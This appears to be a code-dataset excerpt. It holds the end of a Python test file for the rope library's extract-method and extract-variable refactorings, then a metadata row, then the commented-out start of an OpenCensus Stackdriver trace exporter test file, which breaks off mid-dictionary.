end = code.rindex('+') + 1
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
# FIXME: Extract method should be more intelligent about bad ranges
def xxx_test_raising_exception_on_function_parens(self):
code = 'a = range(10)'
start = code.index('(')
end = code.rindex(')') + 1
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_and_extra_blank_lines(self):
code = '\nprint(1)\n'
refactored = self.do_extract_method(code, 0, len(code), 'new_f')
expected = '\n\ndef new_f():\n print(1)\n\nnew_f()\n'
self.assertEquals(expected, refactored)
def test_variable_writes_in_the_same_line_as_variable_read(self):
code = 'a = 1\na = 1 + a\n'
start = code.index('\n') + 1
end = len(code)
refactored = self.do_extract_method(code, start, end, 'new_f',
global_=True)
expected = 'a = 1\n\ndef new_f(a):\n a = 1 + a\n\nnew_f(a)\n'
self.assertEquals(expected, refactored)
def test_variable_writes_in_the_same_line_as_variable_read2(self):
code = 'a = 1\na += 1\n'
start = code.index('\n') + 1
end = len(code)
refactored = self.do_extract_method(code, start, end, 'new_f',
global_=True)
expected = 'a = 1\n\ndef new_f():\n a += 1\n\nnew_f()\n'
self.assertEquals(expected, refactored)
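# Passing similar=True asks the refactoring to also rewrite other occurrences
# that match the extracted expression or statement, as the next tests verify.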
def test_variable_and_similar_expressions(self):
code = 'a = 1\nb = 1\n'
start = code.index('1')
end = start + 1
refactored = self.do_extract_variable(code, start, end,
'one', similar=True)
expected = 'one = 1\na = one\nb = one\n'
self.assertEquals(expected, refactored)
def test_definition_should_appear_before_the_first_use(self):
code = 'a = 1\nb = 1\n'
start = code.rindex('1')
end = start + 1
refactored = self.do_extract_variable(code, start, end,
'one', similar=True)
expected = 'one = 1\na = one\nb = one\n'
self.assertEquals(expected, refactored)
def test_extract_method_and_similar_expressions(self):
code = 'a = 1\nb = 1\n'
start = code.index('1')
end = start + 1
refactored = self.do_extract_method(code, start, end,
'one', similar=True)
expected = '\ndef one():\n return 1\n\na = one()\nb = one()\n'
self.assertEquals(expected, refactored)
def test_simple_extract_method_and_similar_statements(self):
code = 'class AClass(object):\n\n' \
' def func1(self):\n a = 1 + 2\n b = a\n' \
' def func2(self):\n a = 1 + 2\n b = a\n'
start, end = self._convert_line_range_to_offset(code, 4, 4)
refactored = self.do_extract_method(code, start, end,
'new_func', similar=True)
expected = 'class AClass(object):\n\n' \
' def func1(self):\n' \
' a = self.new_func()\n b = a\n\n' \
' def new_func(self):\n' \
' a = 1 + 2\n return a\n' \
' def func2(self):\n' \
' a = self.new_func()\n b = a\n'
self.assertEquals(expected, refactored)
def test_extract_method_and_similar_statements2(self):
code = 'class AClass(object):\n\n' \
' def func1(self, p1):\n a = p1 + 2\n' \
' def func2(self, p2):\n a = p2 + 2\n'
start = code.rindex('p1')
end = code.index('2\n') + 1
refactored = self.do_extract_method(code, start, end,
'new_func', similar=True)
expected = 'class AClass(object):\n\n' \
' def func1(self, p1):\n ' \
'a = self.new_func(p1)\n\n' \
' def new_func(self, p1):\n return p1 + 2\n' \
' def func2(self, p2):\n a = self.new_func(p2)\n'
self.assertEquals(expected, refactored)
def test_extract_method_and_similar_statements_return_is_different(self):
code = 'class AClass(object):\n\n' \
' def func1(self, p1):\n a = p1 + 2\n' \
' def func2(self, p2):\n self.attr = p2 + 2\n'
start = code.rindex('p1')
end = code.index('2\n') + 1
refactored = self.do_extract_method(code, start, end,
'new_func', similar=True)
expected = 'class AClass(object):\n\n' \
' def func1(self, p1):' \
'\n a = self.new_func(p1)\n\n' \
' def new_func(self, p1):\n return p1 + 2\n' \
' def func2(self, p2):\n' \
' self.attr = self.new_func(p2)\n'
self.assertEquals(expected, refactored)
def test_definition_should_appear_where_it_is_visible(self):
code = 'if True:\n a = 1\nelse:\n b = 1\n'
start = code.rindex('1')
end = start + 1
refactored = self.do_extract_variable(code, start, end,
'one', similar=True)
expected = 'one = 1\nif True:\n a = one\nelse:\n b = one\n'
self.assertEquals(expected, refactored)
def test_extract_variable_and_similar_statements_in_classes(self):
code = 'class AClass(object):\n\n' \
' def func1(self):\n a = 1\n' \
' def func2(self):\n b = 1\n'
start = code.index(' 1') + 1
refactored = self.do_extract_variable(code, start, start + 1,
'one', similar=True)
expected = 'class AClass(object):\n\n' \
' def func1(self):\n one = 1\n a = one\n' \
' def func2(self):\n b = 1\n'
self.assertEquals(expected, refactored)
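# Extracting inside a @staticmethod should produce another staticmethod that
# is called through the class name (AClass.one()) instead of self.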
def test_extract_method_in_staticmethods(self):
code = 'class AClass(object):\n\n' \
' @staticmethod\n def func2():\n b = 1\n'
start = code.index(' 1') + 1
refactored = self.do_extract_method(code, start, start + 1,
'one', similar=True)
expected = 'class AClass(object):\n\n' \
' @staticmethod\n def func2():\n' \
' b = AClass.one()\n\n' \
' @staticmethod\n def one():\n' \
' return 1\n'
self.assertEquals(expected, refactored)
def test_extract_normal_method_with_staticmethods(self):
code = 'class AClass(object):\n\n' \
' @staticmethod\n def func1():\n b = 1\n' \
' def func2(self):\n b = 1\n'
start = code.rindex(' 1') + 1
refactored = self.do_extract_method(code, start, start + 1,
'one', similar=True)
expected = 'class AClass(object):\n\n' \
' @staticmethod\n def func1():\n b = 1\n' \
' def func2(self):\n b = self.one()\n\n' \
' def one(self):\n return 1\n'
self.assertEquals(expected, refactored)
def test_extract_variable_with_no_new_lines_at_the_end(self):
code = 'a_var = 10'
start = code.index('10')
end = start + 2
refactored = self.do_extract_variable(code, start, end, 'new_var')
expected = 'new_var = 10\na_var = new_var'
self.assertEquals(expected, refactored)
def test_extract_method_containing_return_in_functions(self):
code = 'def f(arg):\n return arg\nprint(f(1))\n'
start, end = self._convert_line_range_to_offset(code, 1, 3)
refactored = self.do_extract_method(code, start, end, 'a_func')
expected = '\ndef a_func():\n def f(arg):\n return arg\n' \
' print(f(1))\n\na_func()\n'
self.assertEquals(expected, refactored)
def test_extract_method_and_varying_first_parameter(self):
code = 'class C(object):\n' \
' def f1(self):\n print(str(self))\n' \
' def f2(self):\n print(str(1))\n'
start = code.index('print(') + 6
end = code.index('))\n') + 1
refactored = self.do_extract_method(code, start, end,
'to_str', similar=True)
expected = 'class C(object):\n' \
' def f1(self):\n print(self.to_str())\n\n' \
' def to_str(self):\n return str(self)\n' \
' def f2(self):\n print(str(1))\n'
self.assertEquals(expected, refactored)
def test_extract_method_when_an_attribute_exists_in_function_scope(self):
code = 'class A(object):\n def func(self):\n pass\n' \
'a = A()\n' \
'def f():\n' \
' func = a.func()\n' \
' print func\n'
start, end = self._convert_line_range_to_offset(code, 6, 6)
refactored = self.do_extract_method(code, start, end, 'g')
refactored = refactored[refactored.index('A()') + 4:]
expected = 'def f():\n func = g()\n print func\n\n' \
'def g():\n func = a.func()\n return func\n'
self.assertEquals(expected, refactored)
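# global_=True forces the extracted function to module level, even when the
# selection lives inside a method or class.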
def test_global_option_for_extract_method(self):
code = 'def a_func():\n print(1)\n'
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end,
'extracted', global_=True)
expected = 'def a_func():\n extracted()\n\n' \
'def extracted():\n print(1)\n'
self.assertEquals(expected, refactored)
def test_global_extract_method(self):
code = 'class AClass(object):\n\n' \
' def a_func(self):\n print(1)\n'
start, end = self._convert_line_range_to_offset(code, 4, 4)
refactored = self.do_extract_method(code, start, end,
'new_func', global_=True)
expected = 'class AClass(object):\n\n' \
' def a_func(self):\n new_func()\n\n' \
'def new_func():\n print(1)\n'
self.assertEquals(expected, refactored)
def test_extract_method_with_multiple_methods(self): # noqa
code = 'class AClass(object):\n' \
' def a_func(self):\n' \
' print(1)\n\n' \
' def another_func(self):\n' \
' pass\n'
start, end = self._convert_line_range_to_offset(code, 3, 3)
refactored = self.do_extract_method(code, start, end,
'new_func', global_=True)
expected = 'class AClass(object):\n' \
' def a_func(self):\n' \
' new_func()\n\n' \
' def another_func(self):\n' \
' pass\n\n' \
'def new_func():\n' \
' print(1)\n'
self.assertEquals(expected, refactored)
def test_where_to_search_when_extracting_global_names(self):
code = 'def a():\n return 1\ndef b():\n return 1\nb = 1\n'
start = code.index('1')
end = start + 1
refactored = self.do_extract_variable(code, start, end, 'one',
similar=True, global_=True)
expected = 'def a():\n return one\none = 1\n' \
'def b():\n return one\nb = one\n'
self.assertEquals(expected, refactored)
def test_extracting_pieces_with_distinct_temp_names(self):
code = 'a = 1\nprint a\nb = 1\nprint b\n'
start = code.index('a')
end = code.index('\nb')
refactored = self.do_extract_method(code, start, end, 'f',
similar=True, global_=True)
expected = '\ndef f():\n a = 1\n print a\n\nf()\nf()\n'
self.assertEquals(expected, refactored)
def test_extract_methods_in_glob_funcs_should_be_glob(self):
code = 'def f():\n a = 1\ndef g():\n b = 1\n'
start = code.rindex('1')
refactored = self.do_extract_method(code, start, start + 1, 'one',
similar=True, global_=False)
expected = 'def f():\n a = one()\ndef g():\n b = one()\n\n' \
'def one():\n return 1\n'
self.assertEquals(expected, refactored)
def test_extract_methods_in_glob_funcs_should_be_glob_2(self):
code = 'if 1:\n var = 2\n'
start = code.rindex('2')
refactored = self.do_extract_method(code, start, start + 1, 'two',
similar=True, global_=False)
expected = '\ndef two():\n return 2\n\nif 1:\n var = two()\n'
self.assertEquals(expected, refactored)
def test_extract_method_and_try_blocks(self):
code = 'def f():\n try:\n pass\n' \
' except Exception:\n pass\n'
start, end = self._convert_line_range_to_offset(code, 2, 5)
refactored = self.do_extract_method(code, start, end, 'g')
expected = 'def f():\n g()\n\ndef g():\n try:\n pass\n' \
' except Exception:\n pass\n'
self.assertEquals(expected, refactored)
def test_extract_and_not_passing_global_functions(self):
code = 'def next(p):\n return p + 1\nvar = next(1)\n'
start = code.rindex('next')
refactored = self.do_extract_method(code, start, len(code) - 1, 'two')
expected = 'def next(p):\n return p + 1\n' \
'\ndef two():\n return next(1)\n\nvar = two()\n'
self.assertEquals(expected, refactored)
def test_extracting_with_only_one_return(self):
code = 'def f():\n var = 1\n return var\n'
start, end = self._convert_line_range_to_offset(code, 2, 3)
refactored = self.do_extract_method(code, start, end, 'g')
expected = 'def f():\n return g()\n\n' \
'def g():\n var = 1\n return var\n'
self.assertEquals(expected, refactored)
def test_extracting_variable_and_implicit_continuations(self):
code = 's = ("1"\n "2")\n'
start = code.index('"')
end = code.rindex('"') + 1
refactored = self.do_extract_variable(code, start, end, 's2')
expected = 's2 = "1" "2"\ns = (s2)\n'
self.assertEquals(expected, refactored)
def test_extracting_method_and_implicit_continuations(self):
code = 's = ("1"\n "2")\n'
start = code.index('"')
end = code.rindex('"') + 1
refactored = self.do_extract_method(code, start, end, 'f')
expected = '\ndef f():\n return "1" "2"\n\ns = (f())\n'
self.assertEquals(expected, refactored)
def test_passing_conditional_updated_vars_in_extracted(self):
code = 'def f(a):\n' \
' if 0:\n' \
' a = 1\n' \
' print(a)\n'
start, end = self._convert_line_range_to_offset(code, 2, 4)
refactored = self.do_extract_method(code, start, end, 'g')
expected = 'def f(a):\n' \
' g(a)\n\n' \
'def g(a):\n' \
' if 0:\n' \
' a = 1\n' \
' print(a)\n'
self.assertEquals(expected, refactored)
def test_returning_conditional_updated_vars_in_extracted(self):
code = 'def f(a):\n' \
' if 0:\n' \
' a = 1\n' \
' print(a)\n'
start, end = self._convert_line_range_to_offset(code, 2, 3)
refactored = self.do_extract_method(code, start, end, 'g')
expected = 'def f(a):\n' \
' a = g(a)\n' \
' print(a)\n\n' \
'def g(a):\n' \
' if 0:\n' \
' a = 1\n' \
' return a\n'
self.assertEquals(expected, refactored)
def test_extract_method_with_variables_possibly_written_to(self):
code = "def a_func(b):\n" \
" if b > 0:\n" \
" a = 2\n" \
" print a\n"
start, end = self._convert_line_range_to_offset(code, 2, 3)
refactored = self.do_extract_method(code, start, end, 'extracted')
expected = "def a_func(b):\n" \
" a = extracted(b)\n" \
" print a\n\n" \
"def extracted(b):\n" \
" if b > 0:\n" \
" a = 2\n" \
" return a\n"
self.assertEquals(expected, refactored)
if __name__ == '__main__':
unittest.main()
| 47.907055 | 79 | 0.545639 | 5,542 | 42,781 | 3.99188 | 0.046193 | 0.043394 | 0.051123 | 0.076934 | 0.871536 | 0.841568 | 0.824165 | 0.803914 | 0.759255 | 0.727162 | 0 | 0.018629 | 0.322433 | 42,781 | 892 | 80 | 47.960762 | 0.744575 | 0.002688 | 0 | 0.530895 | 0 | 0.002522 | 0.273358 | 0.009587 | 0 | 0 | 0 | 0.001121 | 0.10971 | 1 | 0.116015 | false | 0.02396 | 0.008827 | 0 | 0.129887 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
16b50447e845d584960b1dc23a6adab06dd4366c | 31,253 | py | Python | contrib/opencensus-ext-stackdriver/tests/test_stackdriver_exporter.py | marianhromiak/opencensus-python | c2bd5b0c9b78d91de1a3108ddc376013b3ae6824 | [
"Apache-2.0"
] | null | null | null | contrib/opencensus-ext-stackdriver/tests/test_stackdriver_exporter.py | marianhromiak/opencensus-python | c2bd5b0c9b78d91de1a3108ddc376013b3ae6824 | [
"Apache-2.0"
] | 1 | 2019-05-20T05:17:32.000Z | 2019-05-20T23:21:48.000Z | contrib/opencensus-ext-stackdriver/tests/test_stackdriver_exporter.py | marianhromiak/opencensus-python | c2bd5b0c9b78d91de1a3108ddc376013b3ae6824 | [
"Apache-2.0"
] | 1 | 2019-05-23T17:26:57.000Z | 2019-05-23T17:26:57.000Z | # # Copyright 2017, OpenCensus Authors
# #
# # Licensed under the Apache License, Version 2.0 (the "License");
# # you may not use this file except in compliance with the License.
# # You may obtain a copy of the License at
# #
# # http://www.apache.org/licenses/LICENSE-2.0
# #
# # Unless required by applicable law or agreed to in writing, software
# # distributed under the License is distributed on an "AS IS" BASIS,
# # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# # See the License for the specific language governing permissions and
# # limitations under the License.
# import unittest
# import mock
# from opencensus.common.version import __version__
# from opencensus.ext.stackdriver import trace_exporter
# from opencensus.trace import span_context
# from opencensus.trace import span_data as span_data_module
# class _Client(object):
# def __init__(self, project=None):
# if project is None:
# project = 'PROJECT'
# self.project = project
# class TestStackdriverExporter(unittest.TestCase):
# def test_constructor_default(self):
# patch = mock.patch(
# 'opencensus.ext.stackdriver.trace_exporter.Client',
# new=_Client)
# with patch:
# exporter = trace_exporter.StackdriverExporter()
# project_id = 'PROJECT'
# self.assertEqual(exporter.project_id, project_id)
# def test_constructor_explicit(self):
# client = mock.Mock()
# project_id = 'PROJECT'
# client.project = project_id
# transport = mock.Mock()
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id, transport=transport)
# self.assertIs(exporter.client, client)
# self.assertEqual(exporter.project_id, project_id)
# def test_export(self):
# client = mock.Mock()
# project_id = 'PROJECT'
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id, transport=MockTransport)
# exporter.export({})
# self.assertTrue(exporter.transport.export_called)
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance',
# return_value=None)
# def test_emit(self, mr_mock):
# trace_id = '6e0c63257de34c92bf9efcd03927272e'
# span_datas = [
# span_data_module.SpanData(
# name='span',
# context=span_context.SpanContext(trace_id=trace_id),
# span_id='1111',
# parent_span_id=None,
# attributes=None,
# start_time=None,
# end_time=None,
# child_span_count=None,
# stack_trace=None,
# annotations=None,
# message_events=None,
# links=None,
# status=None,
# same_process_as_parent_span=None,
# span_kind=0,
# )
# ]
# stackdriver_spans = {
# 'spans': [{
# 'status':
# None,
# 'childSpanCount':
# None,
# 'links':
# None,
# 'startTime':
# None,
# 'spanId':
# '1111',
# 'attributes': {
# 'attributeMap': {
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count':
# 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# }
# }
# },
# 'stackTrace':
# None,
# 'displayName': {
# 'truncated_byte_count': 0,
# 'value': 'span'
# },
# 'name':
# 'projects/PROJECT/traces/{}/spans/1111'.format(trace_id),
# 'timeEvents':
# None,
# 'endTime':
# None,
# 'sameProcessAsParentSpan':
# None
# }]
# }
# client = mock.Mock()
# project_id = 'PROJECT'
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id)
# exporter.emit(span_datas)
# name = 'projects/{}'.format(project_id)
# client.batch_write_spans.assert_called_with(name, stackdriver_spans)
# self.assertTrue(client.batch_write_spans.called)
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance',
# return_value=None)
# def test_translate_to_stackdriver(self, mr_mock):
# project_id = 'PROJECT'
# trace_id = '6e0c63257de34c92bf9efcd03927272e'
# span_name = 'test span'
# span_id = '6e0c63257de34c92'
# attributes = {
# 'attributeMap': {
# 'key': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'value'
# }
# },
# 'key_double': {
# 'double_value': {
# 'value': 123.45
# }
# },
# 'http.host': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'host'
# }
# }
# }
# }
# parent_span_id = '6e0c63257de34c93'
# start_time = 'test start time'
# end_time = 'test end time'
# trace = {
# 'spans': [{
# 'displayName': {
# 'value': span_name,
# 'truncated_byte_count': 0
# },
# 'spanId':
# span_id,
# 'startTime':
# start_time,
# 'endTime':
# end_time,
# 'parentSpanId':
# parent_span_id,
# 'attributes':
# attributes,
# 'someRandomKey':
# 'this should not be included in result',
# 'childSpanCount':
# 0
# }],
# 'traceId':
# trace_id
# }
# client = mock.Mock()
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id)
# spans = list(exporter.translate_to_stackdriver(trace))
# expected_traces = [{
# 'name': 'projects/{}/traces/{}/spans/{}'.format(
# project_id, trace_id, span_id),
# 'displayName': {
# 'value': span_name,
# 'truncated_byte_count': 0
# },
# 'attributes': {
# 'attributeMap': {
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# },
# 'key': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'value'
# }
# },
# 'key_double': {
# 'double_value': {
# 'value': 123.45
# }
# },
# '/http/host': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'host'
# }
# }
# }
# },
# 'spanId': str(span_id),
# 'startTime': start_time,
# 'endTime': end_time,
# 'parentSpanId': str(parent_span_id),
# 'status': None,
# 'links': None,
# 'stackTrace': None,
# 'timeEvents': None,
# 'childSpanCount': 0,
# 'sameProcessAsParentSpan': None
# }]
# self.assertEqual(spans, expected_traces)
# def test_translate_common_attributes_to_stackdriver_no_map(self):
# project_id = 'PROJECT'
# client = mock.Mock()
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id)
# attributes = {'outer key': 'some value'}
# expected_attributes = {'outer key': 'some value'}
# exporter.map_attributes(attributes)
# self.assertEqual(attributes, expected_attributes)
# def test_translate_common_attributes_to_stackdriver_none(self):
# project_id = 'PROJECT'
# client = mock.Mock()
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id)
# # does not throw
# self.assertIsNone(exporter.map_attributes(None))
# def test_translate_common_attributes_to_stackdriver(self):
# project_id = 'PROJECT'
# client = mock.Mock()
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id)
# attributes = {
# 'outer key': 'some value',
# 'attributeMap': {
# 'key': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'value'
# }
# },
# 'component': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'http'
# }
# },
# 'error.message': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'error message'
# }
# },
# 'error.name': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'error name'
# }
# },
# 'http.host': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'host'
# }
# },
# 'http.method': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'GET'
# }
# },
# 'http.status_code': {
# 'int_value': {
# 'value': 200
# }
# },
# 'http.url': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'http://host:port/path?query'
# }
# },
# 'http.user_agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'some user agent'
# }
# },
# 'http.client_city': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'Redmond'
# }
# },
# 'http.client_country': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'USA'
# }
# },
# 'http.client_protocol': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'HTTP 1.1'
# }
# },
# 'http.client_region': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'WA'
# }
# },
# 'http.request_size': {
# 'int_value': {
# 'value': 100
# }
# },
# 'http.response_size': {
# 'int_value': {
# 'value': 10
# }
# },
# 'pid': {
# 'int_value': {
# 'value': 123456789
# }
# },
# 'tid': {
# 'int_value': {
# 'value': 987654321
# }
# },
# 'stacktrace': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'at unknown'
# }
# },
# 'grpc.host_port': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'localhost:50051'
# }
# },
# 'grpc.method': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'post'
# }
# }
# }
# }
# expected_attributes = {
# 'outer key': 'some value',
# 'attributeMap': {
# 'key': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'value'
# }
# },
# '/component': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'http'
# }
# },
# '/error/message': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'error message'
# }
# },
# '/error/name': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'error name'
# }
# },
# '/http/host': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'host'
# }
# },
# '/http/method': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'GET'
# }
# },
# '/http/status_code': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': '200'
# }
# },
# '/http/url': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'http://host:port/path?query'
# }
# },
# '/http/user_agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'some user agent'
# }
# },
# '/http/client_city': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'Redmond'
# }
# },
# '/http/client_country': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'USA'
# }
# },
# '/http/client_protocol': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'HTTP 1.1'
# }
# },
# '/http/client_region': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'WA'
# }
# },
# '/http/request/size': {
# 'int_value': {
# 'value': 100
# }
# },
# '/http/response/size': {
# 'int_value': {
# 'value': 10
# }
# },
# '/pid': {
# 'int_value': {
# 'value': 123456789
# }
# },
# '/tid': {
# 'int_value': {
# 'value': 987654321
# }
# },
# '/stacktrace': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'at unknown'
# }
# },
# '/grpc/host_port': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'localhost:50051'
# }
# },
# '/grpc/method': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'post'
# }
# }
# }
# }
# exporter.map_attributes(attributes)
# self.assertEqual(attributes, expected_attributes)
# def test_translate_common_attributes_status_code(self):
# project_id = 'PROJECT'
# client = mock.Mock()
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id)
# attributes = {
# 'outer key': 'some value',
# 'attributeMap': {
# 'http.status_code': {
# 'int_value': 200
# }
# }
# }
# expected_attributes = {
# 'outer key': 'some value',
# 'attributeMap': {
# '/http/status_code': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': '200'
# }
# }
# }
# }
# exporter.map_attributes(attributes)
# self.assertEqual(attributes, expected_attributes)
# class Test_set_attributes_gae(unittest.TestCase):
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance',
# return_value=None)
# def test_set_attributes_gae(self, mr_mock):
# import os
# trace = {'spans': [{'attributes': {}}]}
# expected = {
# 'attributes': {
# 'attributeMap': {
# 'g.co/gae/app/module': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'service'
# }
# },
# 'g.co/gae/app/instance': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'flex'
# }
# },
# 'g.co/gae/app/version': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'version'
# }
# },
# 'g.co/gae/app/project': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'project'
# }
# },
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# },
# }
# }
# }
# with mock.patch.dict(
# os.environ, {
# trace_exporter._APPENGINE_FLEXIBLE_ENV_VM: 'vm',
# trace_exporter._APPENGINE_FLEXIBLE_ENV_FLEX: 'flex',
# 'GOOGLE_CLOUD_PROJECT': 'project',
# 'GAE_SERVICE': 'service',
# 'GAE_VERSION': 'version'
# }):
# self.assertTrue(trace_exporter.is_gae_environment())
# trace_exporter.set_attributes(trace)
# span = trace.get('spans')[0]
# self.assertEqual(span, expected)
# class TestMonitoredResourceAttributes(unittest.TestCase):
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance')
# def test_monitored_resource_attributes_gke(self, gmr_mock):
# import os
# trace = {'spans': [{'attributes': {}}]}
# expected = {
# 'attributes': {
# 'attributeMap': {
# 'g.co/gae/app/module': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'service'
# }
# },
# 'g.co/gae/app/instance': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'flex'
# }
# },
# 'g.co/gae/app/version': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'version'
# }
# },
# 'g.co/gae/app/project': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'project'
# }
# },
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# },
# 'g.co/r/k8s_container/project_id': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'my_project'
# }
# },
# 'g.co/r/k8s_container/location': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'zone1'
# }
# },
# 'g.co/r/k8s_container/namespace_name': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'namespace'
# }
# },
# 'g.co/r/k8s_container/pod_name': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'pod'
# }
# },
# 'g.co/r/k8s_container/cluster_name': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'cluster'
# }
# },
# 'g.co/r/k8s_container/container_name': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'c1'
# }
# },
# }
# }
# }
# mock_resource = mock.Mock()
# mock_resource.get_type.return_value = 'k8s_container'
# mock_resource.get_labels.return_value = {
# 'k8s.io/pod/name': 'pod',
# 'k8s.io/cluster/name': 'cluster',
# 'k8s.io/namespace/name': 'namespace',
# 'k8s.io/container/name': 'c1',
# 'project_id': 'my_project',
# 'zone': 'zone1'
# }
# gmr_mock.return_value = mock_resource
# with mock.patch.dict(
# os.environ, {
# trace_exporter._APPENGINE_FLEXIBLE_ENV_VM: 'vm',
# trace_exporter._APPENGINE_FLEXIBLE_ENV_FLEX: 'flex',
# 'GOOGLE_CLOUD_PROJECT': 'project',
# 'GAE_SERVICE': 'service',
# 'GAE_VERSION': 'version'
# }):
# self.assertTrue(trace_exporter.is_gae_environment())
# trace_exporter.set_attributes(trace)
# span = trace.get('spans')[0]
# self.assertEqual(span, expected)
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance')
# def test_monitored_resource_attributes_gce(self, gmr_mock):
# trace = {'spans': [{'attributes': {}}]}
# expected = {
# 'attributes': {
# 'attributeMap': {
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# },
# 'g.co/r/gce_instance/project_id': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'my_project'
# }
# },
# 'g.co/r/gce_instance/instance_id': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': '12345'
# }
# },
# 'g.co/r/gce_instance/zone': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'zone1'
# }
# },
# }
# }
# }
# mock_resource = mock.Mock()
# mock_resource.get_type.return_value = 'gce_instance'
# mock_resource.get_labels.return_value = {
# 'project_id': 'my_project',
# 'instance_id': '12345',
# 'zone': 'zone1'
# }
# gmr_mock.return_value = mock_resource
# trace_exporter.set_attributes(trace)
# span = trace.get('spans')[0]
# self.assertEqual(span, expected)
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance')
# def test_monitored_resource_attributes_aws(self, amr_mock):
# trace = {'spans': [{'attributes': {}}]}
# expected = {
# 'attributes': {
# 'attributeMap': {
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# },
# 'g.co/r/aws_ec2_instance/aws_account': {
